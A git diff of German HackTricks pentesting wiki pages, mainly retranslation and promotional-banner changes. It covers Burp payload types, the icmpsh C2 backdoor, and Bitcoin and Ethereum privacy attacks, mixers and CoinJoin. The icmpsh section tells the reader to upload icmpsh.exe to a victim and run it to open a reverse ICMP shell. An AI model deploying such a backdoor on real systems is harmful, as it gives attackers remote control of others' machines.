+{% endhint %} # Grundlegende Payloads * **Einfache Liste:** Einfach eine Liste mit einem Eintrag in jeder Zeile * **Laufzeitdatei:** Eine Liste, die zur Laufzeit gelesen wird (nicht im Speicher geladen). Zur Unterstützung großer Listen. -* **Groß-/Kleinschreibung:** Ändern Sie eine Liste von Zeichenketten (keine Änderung, in Kleinbuchstaben, in GROSSBUCHSTABEN, in Eigennamen - Erster Buchstabe großgeschrieben und der Rest in Kleinbuchstaben -, in Eigennamen - Erster Buchstabe großgeschrieben und der Rest bleibt gleich -. +* **Groß-/Kleinschreibung:** Wenden Sie einige Änderungen auf eine Liste von Zeichenfolgen an (Keine Änderung, zu Kleinbuchstaben, zu GROSSBUCHSTABEN, zu Eigennamen - Erster Buchstabe groß und der Rest klein -, zu Eigennamen - Erster Buchstabe groß und der Rest bleibt gleich -. * **Zahlen:** Generieren Sie Zahlen von X bis Y mit Schritt Z oder zufällig. * **Brute Forcer:** Zeichensatz, Mindest- und Höchstlänge. @@ -26,18 +27,3 @@ Andere Möglichkeiten, HackTricks zu unterstützen: {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) - - -
- -Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
diff --git a/c2/icmpsh.md b/c2/icmpsh.md index dcdeb52c6..d6c16ab8c 100644 --- a/c2/icmpsh.md +++ b/c2/icmpsh.md @@ -1,23 +1,23 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.**
+{% endhint %} - -Laden Sie den Backdoor von folgender Adresse herunter: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) +Laden Sie den Backdoor von: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) # Clientseite -Führen Sie das Skript **run.sh** aus. +Führen Sie das Skript aus: **run.sh** **Wenn Sie einen Fehler erhalten, versuchen Sie, die Zeilen zu ändern:** ```bash @@ -35,16 +35,17 @@ Laden Sie **icmpsh.exe** auf das Opfer hoch und führen Sie es aus: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking und üben Sie:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking und üben Sie: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} diff --git a/crypto-and-stego/blockchain-and-crypto-currencies.md b/crypto-and-stego/blockchain-and-crypto-currencies.md index d8d5a0bbb..665eb113a 100644 --- a/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -1,34 +1,35 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
+{% endhint %} -## Grundlegende Konzepte +## Grundkonzepte -- **Smart Contracts** werden als Programme definiert, die auf einer Blockchain ausgeführt werden, wenn bestimmte Bedingungen erfüllt sind, um Vereinbarungen ohne Vermittler zu automatisieren. -- **Dezentrale Anwendungen (dApps)** bauen auf Smart Contracts auf und verfügen über eine benutzerfreundliche Benutzeroberfläche und eine transparente, überprüfbare Backend. -- **Tokens & Coins** unterscheiden sich, wobei Coins als digitales Geld dienen, während Tokens Wert oder Eigentum in bestimmten Kontexten repräsentieren. -- **Utility Tokens** gewähren Zugang zu Dienstleistungen, und **Security Tokens** bedeuten Eigentumsrechte an Vermögenswerten. -- **DeFi** steht für Decentralized Finance und bietet Finanzdienstleistungen ohne zentrale Behörden. -- **DEX** und **DAOs** beziehen sich auf dezentrale Börsenplattformen und dezentrale autonome Organisationen. +- **Smart Contracts** sind Programme, die auf einer Blockchain ausgeführt werden, wenn bestimmte Bedingungen erfüllt sind, um Vereinbarungen automatisch ohne Vermittler auszuführen. +- **Dezentralisierte Anwendungen (dApps)** bauen auf Smart Contracts auf und verfügen über eine benutzerfreundliche Oberfläche und ein transparentes, überprüfbares Backend. +- **Tokens & Coins** unterscheiden sich, wobei Coins als digitales Geld dienen, während Tokens Wert oder Eigentum in spezifischen Kontexten repräsentieren. +- **Utility Tokens** gewähren Zugang zu Dienstleistungen, und **Security Tokens** bedeuten Eigentumsrechte. +- **DeFi** steht für Dezentralisierte Finanzen und bietet Finanzdienstleistungen ohne zentrale Behörden. +- **DEX** und **DAOs** beziehen sich auf Dezentralisierte Börsenplattformen und Dezentralisierte Autonome Organisationen. ## Konsensmechanismen Konsensmechanismen gewährleisten sichere und vereinbarte Transaktionsvalidierungen auf der Blockchain: -- **Proof of Work (PoW)** basiert auf Rechenleistung zur Überprüfung von Transaktionen. -- **Proof of Stake (PoS)** erfordert, dass Validatoren eine bestimmte Menge an Tokens halten, wodurch der Energieverbrauch im Vergleich zu PoW reduziert wird. +- **Proof of Work (PoW)** basiert auf Rechenleistung zur Transaktionsverifizierung. +- **Proof of Stake (PoS)** erfordert, dass Validatoren eine bestimmte Menge an Tokens halten, was den Energieverbrauch im Vergleich zu PoW reduziert. -## Bitcoin-Grundlagen +## Bitcoin Grundlagen ### Transaktionen @@ -37,150 +38,148 @@ Bitcoin-Transaktionen beinhalten die Übertragung von Geldern zwischen Adressen. #### Schlüsselkomponenten: - **Multisignature-Transaktionen** erfordern mehrere Signaturen zur Autorisierung einer Transaktion. -- Transaktionen bestehen aus **Eingängen** (Quelle der Mittel), **Ausgängen** (Ziel), **Gebühren** (an Miner gezahlt) und **Skripten** (Transaktionsregeln). +- Transaktionen bestehen aus **Inputs** (Quelle der Gelder), **Outputs** (Ziel), **Gebühren** (an Miner gezahlt) und **Skripten** (Transaktionsregeln). -### Lightning Network +### Lightning-Netzwerk Ziel ist es, die Skalierbarkeit von Bitcoin zu verbessern, indem mehrere Transaktionen innerhalb eines Kanals ermöglicht werden, wobei nur der endgültige Zustand an die Blockchain übertragen wird. -## Bitcoin-Privatsphäre-Bedenken +## Bitcoin Datenschutzbedenken -Privatsphäre-Angriffe wie **Common Input Ownership** und **UTXO Change Address Detection** nutzen Transaktionsmuster aus. Strategien wie **Mixers** und **CoinJoin** verbessern die Anonymität, indem sie Transaktionsverbindungen zwischen Benutzern verschleiern. +Datenschutzangriffe wie **Common Input Ownership** und **UTXO Change Address Detection** nutzen Transaktionsmuster aus. Strategien wie **Mixers** und **CoinJoin** verbessern die Anonymität, indem sie Transaktionsverbindungen zwischen Benutzern verschleiern. -## Anonymes Erwerben von Bitcoins +## Anonyme Beschaffung von Bitcoins -Methoden umfassen Bargeldhandel, Mining und die Verwendung von Mixern. **CoinJoin** mischt mehrere Transaktionen, um die Rückverfolgbarkeit zu erschweren, während **PayJoin** CoinJoins als reguläre Transaktionen tarnt, um die Privatsphäre zu erhöhen. +Methoden umfassen Bargeldgeschäfte, Mining und die Verwendung von Mixern. **CoinJoin** mischt mehrere Transaktionen, um die Rückverfolgbarkeit zu erschweren, während **PayJoin** CoinJoins als reguläre Transaktionen tarnt, um die Privatsphäre zu erhöhen. -# Bitcoin-Privatsphäre-Angriffe +# Bitcoin Datenschutzangriffe -# Zusammenfassung der Bitcoin-Privatsphäre-Angriffe +# Zusammenfassung der Bitcoin Datenschutzangriffe -In der Welt von Bitcoin sind die Privatsphäre von Transaktionen und die Anonymität der Benutzer oft Gegenstand von Bedenken. Hier ist ein vereinfachter Überblick über verschiedene gängige Methoden, mit denen Angreifer die Bitcoin-Privatsphäre gefährden können. +In der Welt von Bitcoin sind die Privatsphäre von Transaktionen und die Anonymität der Benutzer oft Gegenstand von Bedenken. Hier ist ein vereinfachter Überblick über mehrere gängige Methoden, durch die Angreifer die Bitcoin-Privatsphäre kompromittieren können. -## **Annahme gemeinsamer Eingabe-Besitz** +## **Annahme gemeinsamer Input-Eigentümerschaft** -Es ist in der Regel selten, dass Eingaben von verschiedenen Benutzern in einer einzigen Transaktion kombiniert werden, aufgrund der damit verbundenen Komplexität. Daher wird oft angenommen, dass **zwei Eingabeadressen in derselben Transaktion demselben Besitzer gehören**. +Es ist in der Regel selten, dass Inputs von verschiedenen Benutzern in einer einzigen Transaktion kombiniert werden, aufgrund der damit verbundenen Komplexität. Daher wird angenommen, dass **zwei Input-Adressen in derselben Transaktion demselben Besitzer gehören**. -## **UTXO Change Address Detection** +## **UTXO-Änderungsadressenerkennung** -Eine UTXO, oder **Unspent Transaction Output**, muss vollständig in einer Transaktion ausgegeben werden. Wenn nur ein Teil davon an eine andere Adresse gesendet wird, geht der Rest an eine neue Wechseladresse. Beobachter können annehmen, dass diese neue Adresse dem Absender gehört und somit die Privatsphäre gefährden. +Ein UTXO oder **Unspent Transaction Output** muss vollständig in einer Transaktion ausgegeben werden. Wenn nur ein Teil davon an eine andere Adresse gesendet wird, geht der Rest an eine neue Änderungsadresse. Beobachter können annehmen, dass diese neue Adresse dem Absender gehört, was die Privatsphäre gefährdet. ### Beispiel -Um dies zu verhindern, können Mischdienste oder die Verwendung mehrerer Adressen helfen, den Besitz zu verschleiern. +Um dies zu mildern, können Mischdienste oder die Verwendung mehrerer Adressen helfen, die Eigentumsverhältnisse zu verschleiern. -## **Exposition in sozialen Netzwerken und Foren** +## **Exposition in sozialen Netzwerken & Foren** Benutzer teilen manchmal ihre Bitcoin-Adressen online, was es **einfach macht, die Adresse ihrem Besitzer zuzuordnen**. -## **Analyse des Transaktionsgraphen** +## **Transaktionsgraphenanalyse** -Transaktionen können als Graphen visualisiert werden, der potenzielle Verbindungen zwischen Benutzern aufgrund des Geldflusses aufzeigt. +Transaktionen können als Graphen visualisiert werden, wodurch potenzielle Verbindungen zwischen Benutzern basierend auf dem Geldfluss sichtbar werden. -## **Unnötige Eingabe-Heuristik (Optimal Change Heuristic)** +## **Heuristik für unnötige Inputs (Optimale Änderungsheuristik)** -Diese Heuristik basiert auf der Analyse von Transaktionen mit mehreren Eingängen und Ausgängen, um zu erraten, welcher Ausgang die Rückgabe an den Absender ist. +Diese Heuristik basiert auf der Analyse von Transaktionen mit mehreren Inputs und Outputs, um zu erraten, welcher Output die Änderung ist, die an den Absender zurückgeht. ### Beispiel ```bash 2 btc --> 4 btc 3 btc 1 btc ``` -Wenn das Hinzufügen weiterer Eingaben dazu führt, dass die Ausgabe größer ist als jeder einzelne Eingabe, kann dies die Heuristik verwirren. - ## **Erzwungene Adresswiederverwendung** -Angreifer können kleine Beträge an zuvor verwendete Adressen senden, in der Hoffnung, dass der Empfänger diese in zukünftigen Transaktionen mit anderen Eingaben kombiniert und somit die Adressen miteinander verknüpft. +Angreifer können kleine Beträge an zuvor verwendete Adressen senden, in der Hoffnung, dass der Empfänger diese in zukünftigen Transaktionen mit anderen Inputs kombiniert und somit Adressen miteinander verknüpft. -### Korrektes Verhalten der Wallet +### Korrektes Verhalten des Wallets Wallets sollten vermeiden, Münzen, die auf bereits verwendeten, leeren Adressen empfangen wurden, zu verwenden, um dieses Datenschutzleck zu verhindern. ## **Andere Blockchain-Analysetechniken** - **Exakte Zahlungsbeträge:** Transaktionen ohne Wechselgeld stammen wahrscheinlich von zwei Adressen, die demselben Benutzer gehören. -- **Runde Zahlen:** Eine runde Zahl in einer Transaktion deutet darauf hin, dass es sich um eine Zahlung handelt, wobei die nicht runde Ausgabe wahrscheinlich das Wechselgeld ist. -- **Wallet-Fingerprinting:** Unterschiedliche Wallets haben einzigartige Muster bei der Erstellung von Transaktionen, was Analysten ermöglicht, die verwendete Software und möglicherweise die Wechseladresse zu identifizieren. -- **Korrelation von Beträgen und Zeitpunkten:** Die Offenlegung von Transaktionszeiten oder -beträgen kann Transaktionen nachverfolgbar machen. +- **Runde Beträge:** Ein runder Betrag in einer Transaktion deutet darauf hin, dass es sich um eine Zahlung handelt, wobei der nicht runde Output wahrscheinlich das Wechselgeld ist. +- **Wallet-Fingerprinting:** Unterschiedliche Wallets haben einzigartige Transaktionsmuster, die es Analysten ermöglichen, die verwendete Software und potenziell die Wechselgeldadresse zu identifizieren. +- **Betrag & Zeitkorrelationen:** Die Offenlegung von Transaktionszeiten oder -beträgen kann Transaktionen nachvollziehbar machen. -## **Traffic-Analyse** +## **Verkehrsanalyse** -Durch Überwachung des Netzwerkverkehrs können Angreifer potenziell Transaktionen oder Blöcke mit IP-Adressen verknüpfen und die Privatsphäre der Benutzer gefährden. Dies gilt insbesondere, wenn eine Entität viele Bitcoin-Knoten betreibt und so ihre Fähigkeit zur Überwachung von Transaktionen erhöht. +Durch die Überwachung des Netzwerkverkehrs können Angreifer potenziell Transaktionen oder Blöcke mit IP-Adressen verknüpfen und die Benutzerdatenschutz gefährden. Dies trifft besonders zu, wenn eine Entität viele Bitcoin-Nodes betreibt, was ihre Fähigkeit zur Überwachung von Transaktionen verbessert. ## Mehr -Für eine umfassende Liste von Angriffen auf die Privatsphäre und Verteidigungsmöglichkeiten besuchen Sie [Bitcoin Privacy auf Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +Für eine umfassende Liste von Datenschutzangriffen und -verteidigungen besuchen Sie [Bitcoin Privacy auf Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). # Anonyme Bitcoin-Transaktionen ## Möglichkeiten, Bitcoins anonym zu erhalten -- **Bargeldtransaktionen**: Erwerb von Bitcoin gegen Bargeld. -- **Bargeldalternativen**: Kauf von Geschenkkarten und Umtausch gegen Bitcoin im Internet. -- **Mining**: Die privateste Methode, Bitcoins zu verdienen, ist das Mining, insbesondere wenn es alleine durchgeführt wird, da Mining-Pools die IP-Adresse des Miners kennen könnten. [Informationen zu Mining-Pools](https://en.bitcoin.it/wiki/Pooled_mining) +- **Bartransaktionen**: Bitcoin durch Bargeld erwerben. +- **Baralternativen**: Kauf von Geschenkkarten und Umtausch gegen Bitcoin online. +- **Mining**: Die privateste Methode, Bitcoins zu verdienen, ist das Mining, insbesondere wenn es alleine durchgeführt wird, da Mining-Pools die IP-Adresse des Miners kennen könnten. [Mining-Pools-Informationen](https://en.bitcoin.it/wiki/Pooled_mining) - **Diebstahl**: Theoretisch könnte der Diebstahl von Bitcoin eine weitere Methode sein, um es anonym zu erwerben, obwohl dies illegal ist und nicht empfohlen wird. ## Mixing-Services -Durch die Verwendung eines Mixing-Services kann ein Benutzer **Bitcoins senden** und **verschiedene Bitcoins als Gegenleistung erhalten**, was die Rückverfolgung des ursprünglichen Eigentümers erschwert. Dies erfordert jedoch Vertrauen in den Service, dass er keine Protokolle führt und die Bitcoins tatsächlich zurückgibt. Alternative Mixing-Optionen umfassen Bitcoin-Casinos. +Durch die Verwendung eines Mixing-Services kann ein Benutzer **Bitcoins senden** und **andere Bitcoins als Gegenleistung erhalten**, was es schwierig macht, den ursprünglichen Besitzer zurückzuverfolgen. Dies erfordert jedoch Vertrauen in den Service, keine Logs zu behalten und tatsächlich die Bitcoins zurückzugeben. Alternative Mixing-Optionen umfassen Bitcoin-Casinos. ## CoinJoin -**CoinJoin** vereint mehrere Transaktionen von verschiedenen Benutzern zu einer einzigen, was den Prozess für jeden erschwert, der versucht, Eingaben mit Ausgaben abzugleichen. Trotz seiner Effektivität können Transaktionen mit eindeutigen Eingabe- und Ausgabegrößen immer noch potenziell zurückverfolgt werden. +**CoinJoin** fusioniert mehrere Transaktionen von verschiedenen Benutzern zu einer einzigen, was den Prozess für jeden erschwert, der versucht, Inputs mit Outputs abzugleichen. Trotz seiner Wirksamkeit können Transaktionen mit einzigartigen Input- und Output-Größen potenziell immer noch zurückverfolgt werden. Beispieltransaktionen, die möglicherweise CoinJoin verwendet haben, sind `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` und `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -Für weitere Informationen besuchen Sie [CoinJoin](https://coinjoin.io/en). Für einen ähnlichen Service auf Ethereum schauen Sie sich [Tornado Cash](https://tornado.cash) an, der Transaktionen mit Mitteln von Minern anonymisiert. +Für weitere Informationen besuchen Sie [CoinJoin](https://coinjoin.io/en). Für einen ähnlichen Service auf Ethereum werfen Sie einen Blick auf [Tornado Cash](https://tornado.cash), der Transaktionen mit Mitteln von Minern anonymisiert. ## PayJoin -Eine Variante von CoinJoin, **PayJoin** (oder P2EP), tarnt die Transaktion zwischen zwei Parteien (z. B. einem Kunden und einem Händler) als reguläre Transaktion, ohne die charakteristische Gleichheit der Ausgaben von CoinJoin. Dadurch wird es äußerst schwierig zu erkennen und könnte die von Transaktionsüberwachungseinheiten verwendete Heuristik zur gemeinsamen Eingabe-Eigentümerschaft ungültig machen. +Eine Variante von CoinJoin, **PayJoin** (oder P2EP), tarnt die Transaktion zwischen zwei Parteien (z. B. einem Kunden und einem Händler) als reguläre Transaktion, ohne die charakteristischen gleichen Outputs von CoinJoin. Dies macht es äußerst schwer zu erkennen und könnte die häufig verwendete Heuristik zur Eigentumszuordnung von gemeinsamen Inputs, die von Transaktionsüberwachungseinheiten verwendet wird, ungültig machen. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -Transaktionen wie die oben genannte könnten PayJoin sein, was die Privatsphäre erhöht, während sie von herkömmlichen Bitcoin-Transaktionen nicht zu unterscheiden sind. +Transaktionen wie die oben genannte könnten PayJoin sein, die die Privatsphäre verbessern, während sie von Standard-Bitcoin-Transaktionen nicht zu unterscheiden sind. -**Die Verwendung von PayJoin könnte herkömmliche Überwachungsmethoden erheblich stören**, was eine vielversprechende Entwicklung in Bezug auf die Wahrung der Transaktionsprivatsphäre darstellt. +**Die Nutzung von PayJoin könnte herkömmliche Überwachungsmethoden erheblich stören**, was eine vielversprechende Entwicklung in der Verfolgung der Transaktionsprivatsphäre darstellt. -# Best Practices für Privatsphäre in Kryptowährungen +# Beste Praktiken für Privatsphäre in Kryptowährungen -## **Techniken zur Wallet-Synchronisierung** +## **Wallet-Synchronisationstechniken** -Um Privatsphäre und Sicherheit zu gewährleisten, ist die Synchronisierung von Wallets mit der Blockchain entscheidend. Zwei Methoden sind besonders herausragend: +Um die Privatsphäre und Sicherheit zu gewährleisten, ist die Synchronisierung von Wallets mit der Blockchain entscheidend. Zwei Methoden stechen heraus: -- **Full Node**: Durch das Herunterladen der gesamten Blockchain stellt ein Full Node maximale Privatsphäre sicher. Alle jemals getätigten Transaktionen werden lokal gespeichert, sodass es für Angreifer unmöglich ist, herauszufinden, an welchen Transaktionen oder Adressen der Benutzer interessiert ist. -- **Client-seitige Blockfilterung**: Diese Methode beinhaltet das Erstellen von Filtern für jeden Block in der Blockchain, sodass Wallets relevante Transaktionen identifizieren können, ohne spezifische Interessen für Netzwerkbeobachter preiszugeben. Leichte Wallets laden diese Filter herunter und holen nur vollständige Blöcke ab, wenn eine Übereinstimmung mit den Adressen des Benutzers gefunden wird. +- **Full Node**: Durch das Herunterladen der gesamten Blockchain stellt ein Full Node maximale Privatsphäre sicher. Alle jemals getätigten Transaktionen werden lokal gespeichert, was es für Angreifer unmöglich macht, zu identifizieren, an welchen Transaktionen oder Adressen der Benutzer interessiert ist. +- **Client-seitige Blockfilterung**: Diese Methode beinhaltet die Erstellung von Filtern für jeden Block in der Blockchain, die es Wallets ermöglichen, relevante Transaktionen zu identifizieren, ohne spezifische Interessen für Netzwerkbeobachter preiszugeben. Leichte Wallets laden diese Filter herunter und holen nur vollständige Blöcke ab, wenn eine Übereinstimmung mit den Adressen des Benutzers gefunden wird. ## **Nutzung von Tor für Anonymität** Da Bitcoin auf einem Peer-to-Peer-Netzwerk basiert, wird die Verwendung von Tor empfohlen, um Ihre IP-Adresse zu verschleiern und die Privatsphäre bei der Interaktion mit dem Netzwerk zu erhöhen. -## **Vermeidung von Adresswiederverwendung** +## **Vermeidung von Adressen-Wiederverwendung** -Um die Privatsphäre zu schützen, ist es wichtig, für jede Transaktion eine neue Adresse zu verwenden. Die Wiederverwendung von Adressen kann die Privatsphäre gefährden, indem Transaktionen mit derselben Entität verknüpft werden. Moderne Wallets entmutigen die Adresswiederverwendung durch ihr Design. +Um die Privatsphäre zu schützen, ist es wichtig, für jede Transaktion eine neue Adresse zu verwenden. Die Wiederverwendung von Adressen kann die Privatsphäre gefährden, indem Transaktionen mit derselben Entität verknüpft werden. Moderne Wallets entmutigen die Adressen-Wiederverwendung durch ihr Design. ## **Strategien für Transaktionsprivatsphäre** -- **Mehrere Transaktionen**: Die Aufteilung einer Zahlung in mehrere Transaktionen kann den Transaktionsbetrag verschleiern und Privatsphäreangriffe vereiteln. -- **Vermeidung von Wechselgeld**: Die Wahl von Transaktionen, die kein Wechselgeld erfordern, erhöht die Privatsphäre, indem Wechselgeld-Erkennungsmethoden gestört werden. -- **Mehrere Wechselgeldausgaben**: Wenn das Vermeiden von Wechselgeld nicht möglich ist, kann die Generierung mehrerer Wechselgeldausgaben die Privatsphäre dennoch verbessern. +- **Mehrere Transaktionen**: Die Aufteilung einer Zahlung in mehrere Transaktionen kann den Transaktionsbetrag verschleiern und Datenschutzangriffe vereiteln. +- **Vermeidung von Wechselgeld**: Die Wahl von Transaktionen, die keine Wechselgeldausgaben erfordern, erhöht die Privatsphäre, indem Wechselgelderfassungsmethoden gestört wird. +- **Mehrere Wechselgeldausgaben**: Wenn die Vermeidung von Wechselgeld nicht möglich ist, kann die Generierung mehrerer Wechselgeldausgaben dennoch die Privatsphäre verbessern. # **Monero: Ein Leuchtfeuer der Anonymität** -Monero adressiert das Bedürfnis nach absoluter Anonymität bei digitalen Transaktionen und setzt einen hohen Standard für Privatsphäre. +Monero deckt den Bedarf an absoluter Anonymität bei digitalen Transaktionen ab und setzt einen hohen Standard für Privatsphäre. # **Ethereum: Gas und Transaktionen** ## **Verständnis von Gas** -Gas misst den Rechenaufwand, der für die Ausführung von Operationen auf Ethereum erforderlich ist, und wird in **Gwei** berechnet. Eine Transaktion, die 2.310.000 Gwei (oder 0,00231 ETH) kostet, umfasst ein Gaslimit und eine Basisgebühr sowie ein Trinkgeld zur Anreizung der Miner. Benutzer können eine maximale Gebühr festlegen, um sicherzustellen, dass sie nicht zu viel bezahlen, wobei der Überschuss zurückerstattet wird. +Gas misst den Rechenaufwand, der benötigt wird, um Operationen auf Ethereum auszuführen, und wird in **Gwei** bemessen. Zum Beispiel erfordert eine Transaktion, die 2.310.000 Gwei (oder 0,00231 ETH) kostet, ein Gaslimit und eine Grundgebühr sowie ein Trinkgeld zur Anreizsetzung für Miner. Benutzer können eine maximale Gebühr festlegen, um sicherzustellen, dass sie nicht zu viel bezahlen, wobei der Überschuss zurückerstattet wird. ## **Ausführung von Transaktionen** -Transaktionen in Ethereum umfassen einen Absender und einen Empfänger, die entweder Benutzer- oder Smart Contract-Adressen sein können. Sie erfordern eine Gebühr und müssen gemint werden. Wesentliche Informationen in einer Transaktion sind der Empfänger, die Signatur des Absenders, der Wert, optionale Daten, das Gaslimit und die Gebühren. Beachtenswert ist, dass die Adresse des Absenders aus der Signatur abgeleitet wird und daher nicht in den Transaktionsdaten enthalten sein muss. +Transaktionen in Ethereum beinhalten einen Absender und einen Empfänger, die entweder Benutzer- oder Smart-Vertragsadressen sein können. Sie erfordern eine Gebühr und müssen gemined werden. Wesentliche Informationen in einer Transaktion sind der Empfänger, die Signatur des Absenders, der Wert, optionale Daten, das Gaslimit und die Gebühren. Bemerkenswert ist, dass die Adresse des Absenders aus der Signatur abgeleitet wird, was die Notwendigkeit dafür in den Transaktionsdaten eliminiert. 